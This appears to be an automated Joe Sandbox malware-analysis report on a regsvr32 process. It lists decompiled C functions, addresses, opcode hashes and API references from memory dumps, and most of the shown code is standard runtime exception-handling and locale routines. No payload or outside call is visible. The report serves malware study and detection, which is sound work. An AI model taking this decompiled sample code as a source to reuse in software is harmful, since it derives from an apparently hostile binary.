Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterUnhandled__decode_pointer
String ID:
API String ID: 3341406909-0
Opcode ID: 256498fad8dd293f0897c2d7e8146ec3c5da94e749d569338862c0a9c39ce158
Instruction ID: 0b8ff90c762177cb4262a9c9bfd39b6c4ec6198abd1039df5ae5b5d61abb7110
Opcode Fuzzy Hash: 256498fad8dd293f0897c2d7e8146ec3c5da94e749d569338862c0a9c39ce158
Instruction Fuzzy Hash: F5C08C808082800FF7016736648D32C3A04EB0100AF9018ADD040C4242D6DCA44BC129

Uniqueness

Uniqueness Score: -1.00%

Function 04D72485, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D72485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x4d741f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x4d74240 = 1;
										__eflags =  *0x4d74240;
										if( *0x4d74240 != 0) {
											goto L60;
										}
										_t84 =  *0x4d741f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x4d74240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x4d741f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x4d74200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x4d741fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x4d74200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x4d74200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x4d74240 = 1;
							__eflags =  *0x4d74240;
							if( *0x4d74240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x4d74200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x4d74200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x4d74240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x4d74200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x4d741f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x4d74200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x4d74200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x04d7248f
0x04d72492
0x04d72498
0x04d724b6
0x00000000
0x04d724b6
0x04d724a0
0x04d724a9
0x04d724af
0x04d724be
0x04d724c1
0x04d724c4
0x04d724ce
0x04d724ce
0x04d724d0
0x04d724d3
0x04d724d5
0x04d724d5
0x04d724d7
0x04d724da
0x00000000
0x00000000
0x04d724dc
0x04d724de
0x04d72544
0x04d72544
0x04d726a2
0x00000000
0x04d726a2
0x04d724e0
0x04d724e0
0x04d724e4
0x04d724e6
0x04d724e6
0x04d724e6
0x04d724e6
0x04d724e9
0x04d724ea
0x04d724ed
0x04d724ed
0x04d724f1
0x04d724f5
0x04d72503
0x04d72503
0x04d7250b
0x04d72511
0x04d72513
0x04d72515
0x04d72525
0x04d72532
0x04d72536
0x04d7253b
0x04d7253d
0x04d725bb
0x04d725bb
0x04d7253f
0x04d7253f
0x04d7253f
0x04d725bd
0x04d725bf
0x04d726a0
0x04d726a0
0x00000000
0x04d725c5
0x04d725c5
0x04d725cc
0x00000000
0x00000000
0x04d725d2
0x04d725d6
0x04d72632
0x04d72634
0x04d7263c
0x04d7263e
0x04d72640
0x00000000
0x00000000
0x04d72642
0x04d72648
0x04d7264a
0x04d7264c
0x04d72661
0x04d72661
0x04d72663
0x04d72692
0x04d72699
0x00000000
0x04d72699
0x04d72667
0x04d72668
0x04d7266a
0x04d7266c
0x04d7266c
0x04d7266e
0x04d72670
0x04d72672
0x04d72686
0x04d72686
0x04d72689
0x04d7268b
0x04d7268b
0x04d7268c
0x04d7268c
0x00000000
0x04d72674
0x04d72674
0x04d72674
0x04d7267d
0x04d7267e
0x04d72680
0x04d72682
0x04d72682
0x00000000
0x04d72674
0x04d72672
0x04d7264e
0x04d72655
0x04d72655
0x04d72657
0x00000000
0x00000000
0x04d72659
0x04d7265a
0x04d7265d
0x04d7265f
0x00000000
0x00000000
0x00000000
0x04d7265f
0x00000000
0x04d72655
0x04d725d8
0x04d725db
0x04d725e0
0x00000000
0x00000000
0x04d725e9
0x04d725eb
0x04d725f1
0x00000000
0x00000000
0x04d725f7
0x04d725fd
0x00000000
0x00000000
0x04d72603
0x04d72605
0x04d7260e
0x04d72612
0x00000000
0x00000000
0x04d72618
0x04d7261b
0x04d7261d
0x00000000
0x00000000
0x04d72624
0x04d72626
0x00000000
0x00000000
0x04d72628
0x04d7262c
0x00000000
0x00000000
0x00000000
0x04d7262c
0x00000000
0x00000000
0x00000000
0x04d72517
0x04d72517
0x04d72517
0x04d7251e
0x00000000
0x00000000
0x04d72520
0x04d72521
0x04d72523
0x00000000
0x00000000
0x00000000
0x04d72523
0x04d7254b
0x04d7254d
0x00000000
0x00000000
0x04d7255d
0x04d7255f
0x04d72561
0x00000000
0x00000000
0x04d72567
0x04d7256e
0x04d7259a
0x04d7259a
0x04d7259c
0x04d7259e
0x04d725b2
0x04d725b4
0x00000000
0x00000000
0x00000000
0x00000000
0x04d725a0
0x04d725a0
0x04d725a0
0x04d725a9
0x04d725aa
0x04d725ac
0x04d725ae
0x04d725ae
0x00000000
0x04d725a0
0x04d72570
0x04d72573
0x04d72575
0x04d72587
0x04d72587
0x04d7258a
0x04d7258c
0x04d7258c
0x04d7258d
0x04d7258d
0x04d72593
0x00000000
0x00000000
0x00000000
0x00000000
0x04d72577
0x04d72577
0x04d72577
0x04d7257e
0x00000000
0x00000000
0x04d72580
0x04d72580
0x04d72581
0x00000000
0x00000000
0x00000000
0x04d72581
0x04d72583
0x04d72585
0x04d72598
0x00000000
0x00000000
0x00000000
0x04d72598
0x00000000
0x04d72585
0x04d724f7
0x04d724fa
0x04d724fd
0x00000000
0x00000000
0x04d724ff
0x04d72501
0x00000000
0x00000000
0x00000000
0x04d72501
0x04d724c6
0x04d724c8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 04D72536

Memory Dump Source

Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 1d4e5d00cc66bea443f19e89faca48c90657286c177e28d97c9d1d31d465e89d
Instruction ID: c59114725c44396c7cd9bdb0cbd7d85e1f1ab1f969b2421541aee3e59987a78a
Opcode Fuzzy Hash: 1d4e5d00cc66bea443f19e89faca48c90657286c177e28d97c9d1d31d465e89d
Instruction Fuzzy Hash: AE61B2307406929FDB2ACE28D8E476D73F6FB95358F6484AAD956C7290F730F8828650

Uniqueness

Uniqueness Score: -1.00%

Function 04D8FB78, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(Function_000107DF,00000001), ref: 04D8FB91

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 4df5a7adc2633f98dc9b510e6ec90e01d3bc9ef0ad31518b4d76852a7561104c
Instruction ID: 584884f0823fe59621862c1cf7fb0df22ac622e5c99e4503f36bbfea91afd6fa
Opcode Fuzzy Hash: 4df5a7adc2633f98dc9b510e6ec90e01d3bc9ef0ad31518b4d76852a7561104c
Instruction Fuzzy Hash: 5CD052B0E003008BE7202F70A988BB177E0FB10B1AFA0880DDC9280480C2B8A8CA8A00

Uniqueness

Uniqueness Score: -1.00%

Function 04D85C73, Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

csm, xrefs: 04D85D69

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID:
String ID: csm
API String ID: 0-1018135373
Opcode ID: ab92b5ffd4751508c2f9bfae7263aa02ff3da691027cfd2ee4e573425adbcd34
Instruction ID: d17376f0560d1c6f65de68e2d51ee82139ef4e3041f0cf0e5326668152a9294d
Opcode Fuzzy Hash: ab92b5ffd4751508c2f9bfae7263aa02ff3da691027cfd2ee4e573425adbcd34
Instruction Fuzzy Hash: E8517D302042019FD724EF29D4A4A7AB3E2FF85728F54856DEC9A8B3A5DB71F844CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04D91398, Relevance: .5, Instructions: 527COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7d55703b9506ff0d440144fa33a006cc085c96c5b8b8f3f49560bf29242630e
Instruction ID: e114917592ae983c6a98893326cac8342d8c7ed9ca6fd7b5fff15c24fb5ba69a
Opcode Fuzzy Hash: e7d55703b9506ff0d440144fa33a006cc085c96c5b8b8f3f49560bf29242630e
Instruction Fuzzy Hash: 75028033D497B39B9F764EB940E056E7AE06F0169030F87E8DCD0AF296D116ED0996E0

Uniqueness

Uniqueness Score: -1.00%

Function 04D9246B, Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: 68110f3cfda3d9ec573c5304ab66e4545c8fe51064d6d3238ea51483b03845d4
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: 1DD17173D0A6B3568F76852E446813EEEE27FC1B9071EC7E19CD47F289D126AD00A6D0

Uniqueness

Uniqueness Score: -1.00%

Function 04D9204B, Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: ae683bb6f3a4317a9d8e2c55847de4f55d67e2b47d4524fada0067c9aee91418
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: BCD19173D0AAB35A8F36852E405417EEAE27FC1B9071ECBE1DCD47F289D126AD1096D0

Uniqueness

Uniqueness Score: -1.00%

Function 04D91C3F, Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: 288ea5e4e0d6f80c5558716ca41783925c657f8b3f1fee8c4c569806ac3bb83b
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: B3C17E73D0AAB34A9F36852E405817EEAE27FC1B9171FC7E18CD46F289D636AC0495D0

Uniqueness

Uniqueness Score: -1.00%

Function 04D9186B, Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: 4e2c9cec36453eeb1ab52f5ba5c4f5ad76d76d7644575d1a4535d2328fcd2e43
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 4EC17273D0AAB34A9F36852E405817FEAE27FC1B8171EC3E18CD46F289D236AD0595D0

Uniqueness

Uniqueness Score: -1.00%

Function 04D7FB80, Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90dc66cdfd41e69948f85542dcf65e487fbd280e61ff67dc2c7f31549b3ad679
Instruction ID: 38e0650aab39f78bae653ca254825e98ee91cec69b1c0be2e53259be25eb0ce1
Opcode Fuzzy Hash: 90dc66cdfd41e69948f85542dcf65e487fbd280e61ff67dc2c7f31549b3ad679
Instruction Fuzzy Hash: B2F12471B00054CBD358EF7AE4B1A697BBAE78830470985AAD44E9F3C5D63CAD48CF60

Uniqueness

Uniqueness Score: -1.00%

Function 04D87131, Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fcc1ea49960309a3f7d89badbc5f5a886f75740285f7379595ec14f633c50ed
Instruction ID: 6772df6a1936797644a9c1b5b56bbbddb05419d804e25ac9ad6920642328a66a
Opcode Fuzzy Hash: 6fcc1ea49960309a3f7d89badbc5f5a886f75740285f7379595ec14f633c50ed
Instruction Fuzzy Hash: 5C31E125B1104346DF7CF83CCD447F696D2F3147A0FF8A13EAC8682D98E515B8838A86

Uniqueness

Uniqueness Score: -1.00%

Function 04D72264, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E04D72264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E04D723CB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E04D72485(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E04D72370(_t55, _t66);
										_t89 = _t66 + 0x10;
										E04D723CB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E04D72467(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x04d72268
0x04d72269
0x04d7226a
0x04d7226d
0x04d7226f
0x04d72272
0x04d72273
0x04d72275
0x04d72276
0x04d72277
0x04d7227a
0x04d72284
0x04d72335
0x04d7233c
0x04d72345
0x04d7228a
0x04d7228a
0x04d72290
0x04d72296
0x04d72299
0x04d7229c
0x04d722a0
0x04d722a5
0x04d722aa
0x04d7232a
0x00000000
0x04d722ac
0x04d722ac
0x04d722b8
0x04d722ba
0x04d72315
0x04d72315
0x04d7231b
0x00000000
0x04d722bc
0x04d722cb
0x04d722cd
0x04d722ce
0x04d722cf
0x04d722d2
0x04d722d2
0x04d722d4
0x00000000
0x04d722d6
0x04d722d6
0x04d72320
0x04d722d8
0x04d722d8
0x04d722dc
0x04d722e4
0x04d722e9
0x04d722ee
0x04d722fa
0x04d72302
0x04d72309
0x04d7230f
0x04d72313
0x00000000
0x04d72313
0x04d722d6
0x04d722d4
0x00000000
0x04d722ba
0x04d7232e
0x04d7232e
0x04d7232e
0x04d722aa
0x04d7234a
0x04d72351

Memory Dump Source

Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true

Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: f08e292baaf744854f2a856aeab72bdbbf506bba70a833b78e1ea64fa5d49d70
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 0621B632A002449FDB10DF68C8C08ABBBA5FF49354B4581ADD9559B245E730FA15C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 04DE21A5, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.477466799.0000000004DE2000.00000040.00020000.sdmp, Offset: 04DE2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4de2000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: e34571464747cbd15b1618f98a9dcbd140333ff8a9b14f11bba09e4ea9f3ee07
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 1A1193733401019FD754DE5ADC81EA2B3EEFB89334B2980AAED04CB311E676E841C760

Uniqueness

Uniqueness Score: -1.00%

Function 04DE259E, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.477466799.0000000004DE2000.00000040.00020000.sdmp, Offset: 04DE2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4de2000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: 8bf0aff8155bd10d13631c88bd530eb3350e582e2847a47b1fd2f9364f7f57ec
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: E70192363052408FD715DB2ADA98D79B7E8FBC5730B2980BED547C7A15E224F845C620

Uniqueness

Uniqueness Score: -1.00%

Function 04D98E8C, Relevance: 25.6, APIs: 17, Instructions: 128COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 04D98EC3
DName::operator+.LIBCMT ref: 04D98ECA
DName::operator+.LIBCMT ref: 04D98ED1
UnDecorator::getBasicDataType.LIBCMT ref: 04D98EDA
DName::operator+=.LIBCMT ref: 04D98F04
UnDecorator::getDimension.LIBCMT ref: 04D98F16
operator+.LIBCMT ref: 04D98F22
DName::operator+.LIBCMT ref: 04D98F2C
DName::operator+=.LIBCMT ref: 04D98F35
operator+.LIBCMT ref: 04D98F64
DName::operator+.LIBCMT ref: 04D98F6E
DName::operator+.LIBCMT ref: 04D98F75
DName::operator=.LIBCMT ref: 04D98F7E
UnDecorator::getPrimaryDataType.LIBCMT ref: 04D98F8B
DName::DName.LIBCMT ref: 04D98FA0
operator+.LIBCMT ref: 04D98FD7
DName::operator+.LIBCMT ref: 04D98FE1

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: Name::operator+$Decorator::getoperator+$DataNameName::Name::operator+=Type$BasicDimensionName::operator=Primary
String ID:
API String ID: 943562707-0
Opcode ID: cc1f283cad272e76a9b27b2dce1cbca1cbb7b0c03c6f9233b8d6a23781bf895d
Instruction ID: 9457002bb55f87d1e99d3712b4b1d23a89bd3a63b88099d47cc804e360168dca
Opcode Fuzzy Hash: cc1f283cad272e76a9b27b2dce1cbca1cbb7b0c03c6f9233b8d6a23781bf895d
Instruction Fuzzy Hash: E2413172B10209AAEF15FAA0CC45FEE77EDEF46A14F00052AF502E7180EA74FA449761

Uniqueness

Uniqueness Score: -1.00%

Function 04D853B0, Relevance: 15.1, APIs: 10, Instructions: 91COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 04D853C6

Part of subcall function 04D8B5A1: __calloc_impl.LIBCMT ref: 04D8B5AF
Part of subcall function 04D8B5A1: Sleep.KERNEL32(00000000,04D8AFC8,00000001,00000214), ref: 04D8B5C6

__calloc_crt.LIBCMT ref: 04D853E9
__calloc_crt.LIBCMT ref: 04D85405
__copytlocinfo_nolock.LIBCMT ref: 04D8542A
__setlocale_nolock.LIBCMT ref: 04D85439
___removelocaleref.LIBCMT ref: 04D85445
___freetlocinfo.LIBCMT ref: 04D8544C
__setmbcp_nolock.LIBCMT ref: 04D85464
___removelocaleref.LIBCMT ref: 04D85479
___freetlocinfo.LIBCMT ref: 04D85480

Memory Dump Source

Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd

Similarity

API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 2969281212-0
